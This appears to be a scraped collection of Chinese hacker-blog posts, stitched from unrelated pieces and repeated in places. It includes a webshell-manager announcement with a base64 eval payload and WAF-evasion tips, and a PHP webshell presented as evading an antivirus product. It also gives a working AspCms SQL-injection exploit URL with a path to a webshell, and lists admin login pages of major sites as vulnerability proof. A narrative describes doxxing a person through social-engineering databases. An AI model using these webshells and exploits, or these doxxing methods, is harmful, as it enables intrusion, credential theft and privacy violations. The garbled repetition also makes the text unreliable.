2015年12月

Burp已经成了绿帽子门必不可少的工具,相信大家都装有Java环境,本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。
一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。顺便当个码农~~~
前前后后大约花了一个月,除了打飞机的时间基本就在写这货了,这里要感谢@MelodyZX  牛,在我完成大体框架后,帮了我不少大忙,包括完成虚拟终端,非常感谢。

程序采用java语言编写,数据库采用了sqlite,本来想使用access,但是在jdk1.8以后移除了该功能,意味不能使用默认环境连接,最终我选择了sqlite,但是体积增加了800多K,程序本身只有100多K,因为引入了连接sqlite的包,后续会删除一些不想关的类来缩小体积。为了给一些爱美玩家使用,特地生成了一个带有大量皮肤的C刀,不过体积肯定也会更大。

主程序为Cknife.jar,运行后会生成Cknife.db,以及默认的配置文件Config.ini。
前面说过这是一款完全基于配置文件的菜刀,主程序只是图形的展示,以及数据的发送,我分开了每一个步骤写入到配置文件里面。可以自定义任何代码,包括更改参数名称,参数内容。
比如:
SKIN=javax.swing.plaf.nimbus.NimbusLookAndFeel 设置皮肤为nimbus
SPL=->|                表示截取数据的开始符号
SPR=|<-               表示截取数据的结束符号
CODE=code         编码参数
ACTION=action    动作参数
PARAM1=z1         参数1
PARAM2=z2         参数2
PHP_BASE64=1   当为PHP时,Z1,Z2参数是否开启自动base64加密,如果想定义自己的加密方式则关闭设置为0
PHP_MAKE=@eval(base64_decode($_POST[action]));   生成方式,这里可以不用该方式,可以用你任何想要的方式
PHP_INDEX=...             显示主页功能的代码放这
PHP_READDICT=...      读取主页功能的代码放着
PHP_READFILE=...       读取文件功能的代码
PHP_DELETE=...           删除文件夹以及文件功能的代码...
PHP_RENAME=...         重命名文件夹以及文件功能的代码...
PHP_NEWDICT=...        新建目录功能的代码
PHP_UPLOAD=...          上传文件功能的代码
PHP_DOWNLOAD=...    下载文件功能的代码
PHP_SHELL=...              虚拟终端功能的代码
如果觉得复杂,其实大多数时间只需要PHP_MAKE过WAF就行了,后面的基本不会查杀。

程序的自定义功能可以用来变相做另外一种免杀
自定义配置如下
CUS_MAKE=1
CUS_INDEX=index
CUS_READDICT=readdict
CUS_READFILE=readfile
CUS_SAVEFILE=savefile
CUS_DELETE=delete
CUS_RENAME=rename
CUS_NEWDICT=newdict
CUS_UPLOAD=upload
CUS_DOWNLOAD=download
CUS_SHELL=shell
只要写的脚本文件能与自定义的能对接上就可以使用。
那么如果做免杀呢?当你只用MAKE的时候确实想不到办法去过WAF的时候,
你可以写一个脚本比如PHP的,但是不是一句话,而是实现正常功能的脚本。
比如这个脚本为1.php,我写一个功能为显示主页的功能,然后提交1.php?action=index,
选择自定义对接,就可以与C刀进行连接了。前提是你的1.php得过WAF。

来几张图吧,先看看皮肤版
01.png
02.png
体积有点大,因为加载了皮肤包。

正常版本,皮肤用的JDK默认的几款,可以自由切换。
MAC下为MAC皮肤,其余系统为Nimbus皮肤,如果没有则使用Metal皮肤

Mac
11.png
0.png
1.png
2.png
3.png

Kali
4.png
5.png
6.png

Win
7.png
8.png
9.png

默认没有的话会使用如下皮肤
10.png

标准版:Cknife.jar
皮肤版:Cknife_Skin.jar

补充下JSP脚本的下载地址,修复了原版本菜刀JSP上传失败的问题。
下载地址:JSP

文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!

Joomla是一套获得过多个奖项的内容管理系统(Content Management System,CMS),它采用PHP+MySQL数据库开发,可以运行在Linux、Windows、MacOSX、Solaris等多种平台上。除了具有新闻/文章管理、文档/图片管理、网站布局设置、模板/主题管理等一些基本功能外,还可以通过其提供的上千个插件进行功能扩展。同时它还支持多种语言,由于它的功能非常强大,语言支持强,因此在全世界范围内都有很广泛的应用。

漏洞技术分析:http://www.freebuf.com/articles/82811.html

百度网盘 密码:htmo

核攻击,一个再熟悉不过的ID,混迹于各大组织论坛。名声在外,兴趣广泛,涉猎奇多

本期我们采访了核攻击。核攻击,一个再熟悉不过的ID,混迹于各大组织论坛。名声在外,兴趣广泛,涉猎奇多。第一次被采访,第一次讲诉自己的经历,第一次讲诉对安全的认识。土司人物采访中的好多朋友都是第一次被采访,过去几期是这样,以后的采访也会是这样。本系列文章目的在于以技术大牛的自诉成长等形式给安全行业增加些我们的思考。

一、自述
我,核攻击,来自中国大西北一处普通的小山村。没有富二代的财富,没有官二代的背景,也没有军二代的后盾……

小时候的记忆已日渐模糊。但依稀记得,那个家,那些年,还是全村著名的贫困户,那个每逢过年过节来讨债的大叔……

不过,小时候学习还算争气,常年霸占年级前三。家里的土坯墙也因为贴满了大大小小的各种奖状,显得金碧辉煌许多。

上学时,追逐戏闹,放学下河捉蟹。晚上在大户人家里蹭黑白电视看动画片……

时光匆匆,岁月如梭,一晃眼到了初中时代……

不负众望,如愿考上了当时县里名牌中学。

进了大县城,入了新学校。也在初一的微机课上第一次亲自摸到了只在黑白电视中见过的计算机,第一次知道还有电脑这种神奇的东西!

从此对它产生了浓厚的兴趣。闲暇时间翻阅各种教科书,逐行逐字看的如痴如醉。

课桌上的初中课本《信息技术》已快被翻烂,里边写满了各种笔记以及自己的心得体会,还在空白处手算二进制、八进制、十进制、十六进制,估计全校就我一个这么干吧,其他人都撕了折飞机……

那时,每周最期待的事情就是上微机课,每次遇到新的问题、知识,就等着在下周的微机课上实践,当时一周只有一节课,有时还被其他老师占了……

后来,应该是在初二吧,在 Word 97 中用 Visual Basic 语言写了人生中的第一个“hello, world”程序,当它成功运行时,兴奋了好几天!

再后来,渐渐地有了十块八块的零花钱,有次在报刊亭看新出的故事会,偶然间瞅到了一本关于黑客的杂志,当时还不知道黑客是什么,只是看到封面和计算机知识有关,一咬牙,拿一周的零食换了这本杂志回来!!!

然后放学火速奔回家,一头扎进去,一直看到半夜才看完,知识第一次被颠覆,原来计算机世界这么大!!!

从此一发不可收拾,什么《黑客X档案》、《黑客防线》、《黑客手册》、《大众电脑》之类的每周必买,当时只有一个报刊亭卖,每次还只有两三本,去迟了就没了!

然后白天就在学校偷偷翻杂志,把一些重要的知识点写在笔记本上,死记硬背书里的 cmd 命令,放学、放假去网吧实践……

每周的书刊都翻了又翻,里边做满了笔记,翻完杂志又去逛杂志官网论坛,自己没有电脑读取附带的光盘内容,就去下载别人发布的光盘镜像,玩那些软件玩的不亦乐乎,书籍一直保留到现在也没舍得卖。

一直买了一两年,直到后来觉得书里的内容太菜了,就再也没买了,后来互联网媒体时代到来,对传统纸质媒体产生冲击,这些书刊有些只出电子版了,大部分直接绝刊倒闭了!

这些书刊对当时的我影响很大,知识在一两年之中突飞猛进,渐渐地在当地小有名气,还收了好几个徒弟,入侵过本地几乎所有网吧,然后这些网吧老板、网管都认得我了,去上网都跟防贼似的看着,当然,也有些最后混成了朋友……

岁月匆匆,一晃眼,已步入了高二的学堂……

这一年,发生了许多事,家里的变故,再加上也没有钱继续交学费,于是就彻底告别了学生生涯,十几岁的我匆匆步入社会,开始赚钱养家……

没有任何社会经验,也没有任何工作能力,一个十几岁的未成年穷屌丝学生能干啥?

最初的几个月都在网吧包夜度过,做着黑产大牛一夜暴富的梦,混时度日,对未来一片渺茫……

数月后,在别人的介绍下,在某网吧开始当网管,一个月工资只有五百多,很低很低,只够吃饱饭,但是每天可以长时间免费上网,这令我很开心,毕竟当时网费还是很贵的……

于是,在这个嘈杂、肮脏、混乱不堪的环境中,度过了我人生中很重要的一段学习时光……

以前对硬件一窍不通,现在天天修机维护,造就了我对硬件的精通,各种疑难杂症手到病除,积累了丰富的底层硬件知识。

这是我黑客生涯最活跃、最巅峰的一段时间,白天端茶泡面、搽桌扫地、修机维护,见识社会各色人等,晚上通宵奋战,横行于各大黑客论坛之中……

也就是在这时结识了蹒跚学步的 t00ls、吾爱破解、看雪、绿色兵团,以及各类杂七杂八的技术论坛,什么黑客动画吧、黑客基地、黑鹰、Dir溢出的红客联盟,只要是个黑客技术网站,就都有我的足迹,甚至还开了个网站叫“巅峰黑客”(现在看起来,真他丫的SB!-_-!!!)!

凭着过硬的技术、雄厚的实力,在 oldjun(老君)的邀请下,混进了 t00ls 核心圈子,还当上了版主,后来因为年轻气盛和某核心成员吵架,又被赶出核心圈,至今保留一个荣誉会员称号……

那个时期,编写、发布过很多软件,可能有人还记得在 t00ls 发布的“全球首款B/S构架远控 Network Rat v8.0”,没错,那个是在网吧连续通宵三五天写出来的!但现在看起来,就像是个玩具……

在网吧的学习生涯,每天都像打了鸡血,知识面涉猎之广,连现在的我都感到恐怖,同时也赋予了我极其丰富的各类知识。

就这样,没日没夜丧心病狂的活着……

时间一晃,一半年过去了,随着在黑客圈知名度的增加,以及技术实力的增强,手里也渐渐地攒了一些钱,终于凑够钱买了人生第一台电脑!某款杂牌机!!!

之后就很少去网吧了,而是蜷缩在县城某个城中村出租屋的黑暗小角落里,用着自己新买的电脑潜心研究,脱去浮躁,慢慢向真正的技术大牛进化,足不出户,不知世上是何年……

花开花落,果生果熟,叶出叶红,叶凋雪落,又一年过去了……

在这期间丰富了更多新的知识,建立了个人小站:http://lcx.cc/,一直运行到现在,同时也见证了乌云的崛起。

后来,机缘巧合,认识了一些公司老总,在贵人大力邀请之下,告别蜷缩了几载的小小出租屋,正式进入搬砖生涯……

再后来,这些年,一直走南闯北,手里也渐渐的有了些积蓄,生活也更舒适一点了……

然后,然后就没有了……

(完)

写在最后:

正是因为对自己变态的要求,才造就了自己的现在,做!就要做第一!

我们现在还很年轻,人生的轨迹,也才刚刚开始。

这个世界,从来就没有什么公正、平等!

既然没有含着金汤勺出生,就更要付出常人千倍、万倍的努力!

在自己的道路上,谱写自己的传奇!

二、自己的故事:

1.网名是怎么来的?核总这头像啥意识?用了这么多年,有什么寓意?

其实我最早网名不叫“Nuclear'Atk(核攻击)”,而是“Hacker'Rose”,后来和 t00ls 核心吵架,那个号封了,然后新注册了一个,想着起个牛逼独特的网名,正巧看到百度新闻“…核攻击…”,就用了……后来也没改过,就用了这么多年,至于寓意,在博客也说过。

2.渗透最久的站用了用了多长时间,最后怎么搞定的?

最久的,断断续续几个月吧,最后 DDOS 迫使其更换服务器,然后你懂得……

3.当你感觉到瓶颈的时候你是怎么做的?

换个思路,绕出来,再从另一入口进,山穷水尽疑无路,柳暗花明又一村~

4.家长对你学习黑客技术持有什么样的态度?亲朋好友之间有学习黑客技术的吗?

因为对这个并不懂,但作为一门技术来说,持支持态度。
部分好友有学习。

5.还有什么其他的兴趣爱好吗?业余时间做什么?在黑客领域之外,还关注那些领域的知识?

兴趣爱好很多,音乐、游戏、电影、摄影、写作等……关注的领域也很多,主要是科技之类的。

6.谈谈大家很关心的避免水表的经验,如何保护自己?

这个问题面太广,完全可以独立写一本书,简单的说的话,把真实身份和虚拟身份隔离使用。

三、核攻击的生存现状

1.核总现在结婚了吗?孩子几岁了?爱人是做什么的呢?

结婚嘛,现在太年轻,太早!女友嘛,这是个奢侈品,不敢拥有~

2.觉得做WEB的10后挣钱方向是啥?

这个不敢妄下评论,我感觉应该是移动端吧。

3.现在的状况是什么样的?未来的打算是什么样的?

现在状况么?在某食品行业搬砖!
未来打算么?谱写自己的传奇!-_-!!!

4.核总技术做了多久?现在做的是技术还是管理?

网络安全经验,大概有十年了。
现在技术管理都做,以后可能转型为管理吧。

四、对当前网络、信息安全的看法

1.网络安全事故频发,你如何看?

任何行业都有安全事故,控制在安全的度里即可。
网络安全近几年由于媒体热炒,再加上技术广泛化,就暴露很多问题了,等过了这个时期,全民安全水平提高,就不会有那么多安全问题了。

2.对现在的国内安全现状和未来的趋势有什么见解?

国内安全现状嘛,个人感觉很混乱,毕竟是一个新兴的行业,还没有发展出自己的规则。未来应该会整合、规则化。

3.国内外的企业应该怎么样避免这些事件的再次发生?

对企业接触不多,不敢妄下评论。但肯定要学习经验、亡羊补牢。

4.对黑产和白帽子的看法是什么?

两者本质没有区别,都是靠技术生存,只是途径不一样。

5.您能否从自己的角度说下现今国内黑产现状与模式以及未来的发展趋势?

这个问题太大,就我个人观点,现在国家政策等原因,未来小鱼小虾会消失,只留下大玩家继续玩,手段也会更隐蔽,但永远都不会消失。

6.有人说黑客圈技术环境变了,在你看来之前的环境是怎么样的,现在的环境是怎么样的?

改变是肯定的,前几年行业新兴,泡沫太大,普遍浮躁,现在泡沫基本消散了,也都静下心了。

7.健康的技术环境应该是怎么样的?

那要看你如何定义“健康”了。

8.黑客需要一个什么样的环境?国家,企业,社会,媒体,个人应该怎么做?

嗯,无限零食供应,超高配置设备,舒适的工作环境,几个极品妹纸助手,嗯,一定是这样的环境!
国家,出台政策,使它逐渐正规化,像过渡到白帽子一样,合法的研究技术。
企业,正视自身网络安全问题,加强自身防范,而不是单方面指责黑客行为。
媒体,合理引导社会舆论。
个人,转职……

9.在安全行业百家争鸣的时代,核总最看好的是哪个方向呢?大数据安全分析?威胁情报?可视化安全?or等等。核总怎么看?

每个方向都各有所长、各有优缺,不能进行简单比较。
我觉得未来大数据分析预测,应该是主流方向。
这里说的不是这些企业搞得那些“概念大数据”,而是将整个社会各行各业数据进行整合分析,虚拟一个世界运行,预测未来发生的事,就像《美国队长》中的洞察计划、《少数派报告》一样,预测犯罪、事故、灾难的发生,并将其消灭在萌芽中,这是很有价值也是很恐怖的一件事。
咳!扯远了……

10.关于信息安全这个行业,核总毕竟也是行业大佬了,眼光肯定很独到,就近几年来看,安全产业发展得也算挺红火,市场需求量也在逐渐增加,政府和大众的重视程度也在提升,这是否就意味着安全行业的未来发展形势会很好,不会受到传说中的互联网寒冬的影响?

这个问题很难回答,我等屌丝也无法预测这类问题。
安全行业是基于企业安全需求的,企业有需求就不会有寒冬,安全行业是个新兴行业,还在发展中,很难预料。

五、对将要踏入信息安全行业的新朋友们提一些建议

1.针对现今网络安全人士,会点渗透,刚大学毕业,开口就要15-40k月薪的看法。小伙伴们毕业没多久,经验不足。但是开口就是几十几十k的要。互联网安全行业现在就是泡沫行业吗? 有一天会突然一下的破了吗?那些没有CISSP,CISP,CISA,Security+ 等等的人,没工作过,以前都是玩CTF长大的孩子们,他们哪里来的勇气?就敢狮子大开口?希望核总发表下核心建议。我们这年头,做安全行业的招聘也好难啊。

无论哪个行业,都不缺刚毕业狮子大开口的愣头青。
很少在安全公司混,这个我没有发言权,就不瞎指点了。
嗯,我也没有那些证。亲,我高中都没毕业,贵公司要吗?

2.渗透工程师行业将来的前景如何?核总能否就渗透相关的职业发表些看法。比如做安全服务(乙方)的,做某产的,成为某家公司的安全团队做维护该公司安全问题(算安全运维了?)的,以及为政府效力做境外目标的。就渗透而言,表弟见识短浅,觉得基本也就这几个职业了(求指点)?然后这些职业分别的优劣在哪些地方?

没在乙方待过,听乙方朋友们说,貌似都很累、甲方都很操蛋,想打人,俩字:蛋疼。
某产么,靠实力吃饭,金子满地有,看你有没有本事活着带出来。现在政策越来越严,估计死的人更多了吧。行业整体呈现龟缩状态,将面临新一轮的洗牌。
安全运维么,没待过,感觉相对乙方应该轻松点,据说是祖传背锅的。
国家队,也没待过,涉密单位,进去的朋友再也没出来过,人间蒸发了,嘘~

3.觉得渗透火候差不多了,想要接着提升安全技术,避免不走弯路的路该怎么走呢(下一阶段学啥最靠谱)?

学着如何防御被渗透,将会接触更多知识面,碰到更复杂困难的问题。

4.荐一些性价比高或者值得拥有的技术方面的书吧,越多越好哈哈。以及核总涉猎的方面的内容简单说一下,对于技术应该怎么学习?

这些年基本没看书,有问题直接百度、谷歌,所以不知如何推荐。
学习技术,面很广,我感觉,挑自己感兴趣的方向入手即可,兴趣是学习的动力!

5.有时候会不会觉得搞安全是一个坑?刚开始学习安全需要实践,但是现实是没有什么好的测试环境供大家实践,只有到处找SQL注入点,到处找XSS点,各种洞,各种点,以求技术上有所突破,但这样有可能会惹上官司,搞不好还要进去蹲上两年,安全处处充满坑,请问核总如何看待?

嗯,所以我转职做食品行业了…… -_-!!!

六、朋友眼中的核攻击

depycode:核总为人很稳重,很有大哥气质。技术很扎实,涉猎广泛深入。从他博客学到很多东西,很感谢核总。

耶稣:喜欢研究东西,,非常低调,知识非常的全面,在他的博客上面学习到了不少的经验,都是他认真思考后发的,可以学到很多。

lmy:核大大是一个很有趣的胖子,身边美女众多……此处省略一万字,重点是软硬都精,软到分分钟来场核风暴,硬到分分钟让你车熄火…借此也感谢核大大帮兄弟解决不少头疼问题…

cond0r:性格比较严肃,不容易接近,但是在技术方面很有钻研精神,有什么问题总要研究出一个所以然来,也乐意分享。

黑客通过各种手段在只有一个微信号的情况下,得到此人姓名,年龄,性别,邮箱,Qq,Qq群,开过什么公司,电话号,之前用过的电话号,支付宝信息,常去网站,等等,虽然走了一些弯路,最终结果以及过程

1.jpg

乌云黑客酒会'拿'走ipad,被200名黑客社会工程学30分钟拿下,应当是比警方速度快很多,谁说书生无用? 微信群里200名黑客通过各种手段在只有一个微信号的情况下,得到此人姓名,年龄,性别,邮箱,Qq,Qq群,开过什么公司,电话号,之前用过的电话号,支付宝信息,常去网站,等等,虽然走了一些弯路,最终结果以及过程.....请慢慢看正文。^_^
前因:
乌云黑客酒会嗨完了,各回各家各找各妈,周六24点在北京正是夜生活正开始的时候,此时在群里转发一条消息,

2.jpg

一个黑客聚会,怎么能被社会黑客搞定呢?群情激愤,大家在找特点,
有人在摄影师的照片中找到一个有些相似的人,第一大特点就是大光头,锁定一人,

3.jpg

此时站出一位黑阔,

4.jpg

他微信写是M后面跟个手机号,试着打了一下,空号,
接着用手机在百度搜索查询,查出来个人名,并且查出公司名

5.jpg

用姓名上北京企业信用信息网,查询有公司,早年已经注销。

6.jpg

又进入死胡同,接黑阔就翻拿走ipad哥们的朋友圈,没想到除了风景,没有什么个人信息,连张正脸照片都没有,看来还是有防范的。

7.jpg

此时,黑阔用小号联系对方,回了如下信息,这是关键点,

8.jpg

用他的这个活动,豆瓣,绿野,查出一些信息,看到一个电话号码,
如何确认电话号码就是微信同一人呢? 支付的时候会提示
9.jpg

看名字就能确认了,

有了电话,反查出来Qq群,邮箱等信息,

10.jpg

加入Qq群,看到群主,与微信同名,确认是此人,

12.png

实际,此处多名黑阔在用不同的方式进行查询人网,社工,
有黑阔直接用手机号在网上搜索,得到Qq群,

13.png

有的黑阔通过社工库,反查出来邮箱,通过邮箱查到Qq号,真是八仙过海,各显神通,就在要动用公安网查身份证时,路猫直接打通了此人电话,对方已经承认了是自己拿走了ipad,但对方只承认是捡拾的。此人已经同意将ipad归还,结果已经不重要,

社会工程学(Social Engineering,又被翻译为:社交工程学)在上世纪60年代左右作为正式的学科出现,广义社会工程学的定义是:建立理论并通过利用自然的、社会的和制度上的途径来逐步地解决各种复杂的社会问题,经过多年的应用发展,社会工程学逐渐产生出了分支学科,如公安社会工程学(简称公安社工学)和网络社会工程学。
过程整理的可能不全面,主要运用了网络社会工程学,用了多少社工库,大家自行判断。有需要30分钟全部聊天记录的,可以问我索取,将截图发你。
下回再搞黑阔聚会,我打算放一个ipad在桌上,请人自取,哈哈,看谁还敢在300多人的黑客聚会上“捡拾”ipad.

1676.jpg

最近被开发者微博圈刷屏的Atom编辑器插件,插件效果图如下:

如果来点音乐、再配上机械键盘的话,写代码是不是爽到爆呢?(脑补使用劲舞团V3…最好准备好晕车药 :))

Windows 7安装

cd .atom/packages
git clone https
://github.com/JoelBesada/activate-power-mode.git
cd activate
-power-mode
apm install

Mac安装

atom编辑器安装:

sudo brew install Caskroom/cask/atom    #OS X 10.11.不支持通过命令行安装&可通过下载DMG文件安装

atom-install shell command

cd /Users/$yourname/.atom/packages
git clone https
://github.com/JoelBesada/activate-power-mode.git
cd activate
-power-mode
apm install
apm ls 
#检测是否安装成功

Packages-Activate Power Mode: Toggle

网页效果demo:http://kushagragour.in/code-blast-codemirror/demo/index.html

atom.io:https://atom.io/packages/activate-power-mode

Atom 编辑器下载

曾经在高二的时候认识一个日本妹子,朋友介绍的,长得很可爱,身高一米六左右……老家是北海道那边的,
她的声音甜甜的,轻柔不做作,爱笑,性格嘛,特别温柔,独处的时候像猫一样温顺,黏在身边,一起看电视聊聊天。性格还是有点害羞的,人多的时候也会不好意思,腼腆地笑笑,
皮肤很白,像雪,像北海道的雪。
妹子话不多,因为我听不懂太多深奥的日语……好在她的想法基本都写在脸上,盯着她看就能猜到她的心情。
……
近距离看,长长的眼睫毛想让人亲一口。
我挺喜欢她的。
直到高三那年,在家人反对声中,也为了学业
我从硬盘里忍痛删了她....

安全狗扫描
过狗shell界面  

不堪回首的过往 不堪回首的过往[/caption]

过狗shell代码:
```
<?
error_reporting(1);
//列目录函数
function dirlist($cd){
        $dh = opendir($cd);
        while($dl = readdir($dh)){
                $dla[] = $dl;
        }
        foreach($dla as $d){
                if(!is_file($cd.$d)&&$d!="."){
                        $content.="<a href='?newdir=".$cd.$d."'>".$d."</a>"."<br />";
                }
        }
        foreach($dla as $d){
                if(is_file($cd.$d)){
                        $content.=$d."<br />";
                }
        }
        return $content;
}
//列出盘符函数
function listDisk(){
        $letters = range('b','z');
        foreach($letters as $l){
                if(is_dir($l.":")){
                        $dlist.= "[<a href='?newdir=".$l.":'>".$l."盘</a>]";
                }
        }
        echo $dlist;
}
//常量定义
$rd = $_SERVER['DOCUMENT_ROOT'];
$fd = $rd.substr($_SERVER['PHP_SELF'],0,strrpos($_SERVER['PHP_SELF'],"/"));
        
        if(!isset($_REQUEST['action'])){
                $ac = "dirlist";
        }else{
                $ac = $_REQUEST['action'];
        }
        if(!isset($_REQUEST['newdir'])){
                $cd = getcwd()."\\";
        }else{
                $cd = $_REQUEST['newdir']."\\";
                chdir($cd);
                $cd = getcwd()."\\";
        }
        switch($ac){
                case "dirlist":$content = dirlist($cd);break;
        }
?>
<html>
<style>
body{
        background-color:#000000;
        color:#FFFFFF;
}
a{
        color:#CC9900;
}
</style>
<body>
<div id="main">
    <div>
    <form name="form1" method="get" action="">
      <label>
      <input name="newdir" type="text" value="<?=$cd?>" size="60">
      </label>
      <label>
      <input type="submit" value="提交">
      </label>
    </form>
    </div>
    <hr color="#FFFFFF" />
  <div id="gongneng">文件目录:[<a href="?newdir=<?=$rd?>">站点根目录</a>][<a href="?newdir=<?=$fd?>">本文件目录</a>]<? listDisk(); ?></div>
        <hr color="#FFFFFF" />
    <div><?=$content?></div>
</div>
</body>
```
</html>
 

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1

————————————————————————
Powered by AspCms2.0
未验证权限,且存在注入漏洞
admin/_content/_About/AspCms_AboutEdit.asp?id=19
表名:aspcms_user
列名:loginname、password

利用EXP:
admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

2.0漏洞测试人:逍遥复仇(请注明)

——————Cookies欺骗——————
cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
逍遥复仇碰到一个站后台被管理员改了,NND。后台主页半天没有找到,最后去官方down源码查看是home.asp(版本不同如不对请试main.asp),工具为:Cookie & Inject Browser
——————webshell获取——————
所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了
admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp

新浪

http://comment.admin.sina.com.cn/cgi-bin/comment/adm_login.cgi

http://dealer.auto.henan.sina.com.cn/auto/4s-admin/login.php

http://bug.show.sina.com.cn/admin/

http://mindcity.sina.com.tw/admin/index.php

http://cinema.ent.sina.com.cn/manage/login.php

腾讯

http://cgi.data.edu.qq.com/admin/web/login.html

http://job.cd.qq.com/admin/

http://admin.dnfcity.qq.com:8080/admin/adminMain.do

http://support.qq.com/beta2/simple_admin/flogin.html

搜狐

http://reseller.mail.sohu.net/auth?next=/

http://go.sohu.com/2010mini/lephonesns/admin/

http://db.auto.sohu.com/admin/testLogin.jsp

http://cas.union.sohu-rd.com/search_wp/admin/login.php

http://cart.sohu.net/admin/

http://saa.auto.sohu.com/admin/admin/login.jsp

http://signup.ifeng.com/freeform/admin/user/login.jsp 凤凰

http://special.ku6.com/admin/login.php 酷六

http://manage.youku.com/manager/login/ 优酷

http://english7.cmail.sogou.com/control/login 搜狗

http://groupadmin.zol.com.cn/manage/login.php 中关村在线

百度

http://sfcrm-exam.baidu.com/admin/managerLoginAction.do

http://www.baidu025.com/admin/adminindexlogin.asp

http://beat.baidu.com/wp-login.php

http://100admin.baihe.com/ 百合网

http://game.pcgames.com.cn/admin/login.jsp 太平洋

http://admin.docin.com/docinadmin/author/login.do 豆丁网

http://edit.pcpop.com/admin/Login.aspx 泡泡网

http://xlapp.xunlei.com:8081/plaf/login.jsf 迅雷

TOM

http://mail.bj.tom.com/cgi-bin/webmail;

http://sms.tom.com/tv/

http://m.tom.com/zhuanti/xwxs/index.php?page=4

http://sms.tom.com/customer/

网易

http://ria.go.163.com/login_old.php

0 g$ m* u8 R- i( R' \

http://product.game.163.com/admin%21index.action

http://data.ent.163.com/admin%21index.action

中国移动10086站

http://admin4.rd139.com/ngoss/Lo … rnUrl=/Default.aspx

http://admin.jx.monternet.com/1860/

联通

http://58.254.132.78/Club/admin/adminIndex.jsp

http://shop.admin.10010.com/

http://admin2.10010.com/login/login_rollback.action

漏洞证明:

新浪

http://comment.admin.sina.com.cn/cgi-bin/comment/adm_login.cgi

http://dealer.auto.henan.sina.com.cn/auto/4s-admin/login.php

http://bug.show.sina.com.cn/admin/

http://mindcity.sina.com.tw/admin/index.php.

http://cinema.ent.sina.com.cn/manage/login.php

腾讯

http://cgi.data.edu.qq.com/admin/web/login.html&;

http://job.cd.qq.com/admin/'

http://admin.dnfcity.qq.com:8080/admin/adminMain.do

http://support.qq.com/beta2/simple_admin/flogin.html

搜狐

http://reseller.mail.sohu.net/auth?next=/

http://go.sohu.com/2010mini/lephonesns/admin/

http://db.auto.sohu.com/admin/testLogin.jsp

http://cas.union.sohu-rd.com/search_wp/admin/login.php

http://cart.sohu.net/admin/

http://saa.auto.sohu.com/admin/admin/login.jsp

http://signup.ifeng.com/freeform/admin/user/login.jsp 凤凰

http://special.ku6.com/admin/login.php 酷六

http://manage.youku.com/manager/login/ 优酷

http://english7.cmail.sogou.com/control/login 搜狗

http://groupadmin.zol.com.cn/manage/login.php 中关村在线

百度

http://sfcrm-exam.baidu.com/admin/managerLoginAction.do)

http://www.baidu025.com/admin/adminindexlogin.asp

http://beat.baidu.com/wp-login.php

http://100admin.baihe.com/ 百合网;

http://game.pcgames.com.cn/admin/login.jsp 太平洋

http://admin.docin.com/docinadmin/author/login.do 豆丁网

http://edit.pcpop.com/admin/Login.aspx 泡泡网

http://xlapp.xunlei.com:8081/plaf/login.jsf 迅雷

TOM

http://mail.bj.tom.com/cgi-bin/webmail

http://sms.tom.com/tv/

http://m.tom.com/zhuanti/xwxs/index.php?page=4

http://sms.tom.com/customer/

网易

http://ria.go.163.com/login_old.php

http://product.game.163.com/admin%21index.action

http://data.ent.163.com/admin%21index.action

中国移动10086站

http://admin4.rd139.com/ngoss/Lo

http://admin.jx.monternet.com/1860/

联通

http://58.254.132.78/Club/admin/adminIndex.jsp

http://shop.admin.10010.com

新浪

http://comment.admin.sina.com.cn/cgi-bin/comment/adm_login.cgi

http://dealer.auto.henan.sina.com.cn/auto/4s-admin/login.php

http://bug.show.sina.com.cn/admin/

http://mindcity.sina.com.tw/admin/index.php

http://cinema.ent.sina.com.cn/manage/login.php

腾讯

http://cgi.data.edu.qq.com/admin/web/login.html

http://job.cd.qq.com/admin/

http://admin.dnfcity.qq.com:8080/admin/adminMain.do

http://support.qq.com/beta2/simple_admin/flogin.html

搜狐

http://reseller.mail.sohu.net/auth?next=/

http://go.sohu.com/2010mini/lephonesns/admin/

http://db.auto.sohu.com/admin/testLogin.jsp

http://cas.union.sohu-rd.com/search_wp/admin/login.php

http://cart.sohu.net/admin/

http://saa.auto.sohu.com/admin/admin/login.jsp

http://signup.ifeng.com/freeform/admin/user/login.jsp 凤凰

http://special.ku6.com/admin/login.php 酷六

http://manage.youku.com/manager/login/ 优酷

http://english7.cmail.sogou.com/control/login 搜狗

http://groupadmin.zol.com.cn/manage/login.php 中关村在线

百度

http://sfcrm-exam.baidu.com/admin/managerLoginAction.do

http://www.baidu025.com/admin/adminindexlogin.asp

http://beat.baidu.com/wp-login.php

http://100admin.baihe.com/ 百合网

http://game.pcgames.com.cn/admin/login.jsp 太平洋

http://admin.docin.com/docinadmin/author/login.do 豆丁网

http://edit.pcpop.com/admin/Login.aspx 泡泡网

http://xlapp.xunlei.com:8081/plaf/login.jsf 迅雷

TOM

http://mail.bj.tom.com/cgi-bin/webmail

http://sms.tom.com/tv/

http://m.tom.com/zhuanti/xwxs/index.php?page=4

http://sms.tom.com/customer/

网易

http://ria.go.163.com/login_old.php

http://product.game.163.com/admin%21index.action

http://data.ent.163.com/admin%21index.action

中国移动10086站

